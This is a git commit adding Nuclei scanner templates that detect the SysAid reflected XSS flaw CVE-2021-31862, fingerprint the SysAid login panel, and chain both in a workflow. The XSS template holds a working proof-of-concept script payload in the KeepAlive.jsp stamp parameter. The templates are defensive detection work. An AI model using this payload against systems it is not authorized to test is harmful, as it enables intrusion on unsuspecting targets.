add CVE-2021-31862 template (#3491)

* add CVE-2021-31862 template

* updated matchers

* Added SysAid panel + workflow

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
JAS-37 2022-01-07 08:58:38 +01:00 committed by GitHub
parent 844c3b4a02
commit 0c7d13d152
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 69 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: CVE-2021-31862
info:
name: SysAid - Reflected XSS
author: jas37
description: SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.
severity: medium
tags: cve,cve2021,xss,sysaid
reference:
- https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-31862
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-31862
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers:
- type: dsl
dsl:
- '(body == "false <script>alert(document.domain)</script>")'
- 'status_code == 200'
condition: and

View File

@ -0,0 +1,29 @@
id: sysaid-panel
info:
name: SysAid Panel
author: pdteam
severity: info
tags: panel,sysaid,helpdesk
requests:
- method: GET
path:
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/Login.jsp"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code==200"
- "('1540720428' == mmh3(base64_py(body)))"
condition: and
- type: dsl
dsl:
- "status_code==200"
- "contains(tolower(body), 'sysaid help desk software')"
condition: and

View File

@ -0,0 +1,11 @@
id: sysaid-workflow
info:
name: SysAid Security Checks
author: pdteam
description: A simple workflow that runs all SysAid related nuclei templates on a given target.
workflows:
- template: exposed-panels/sysaid-panel.yaml
subtemplates:
- tags: sysaid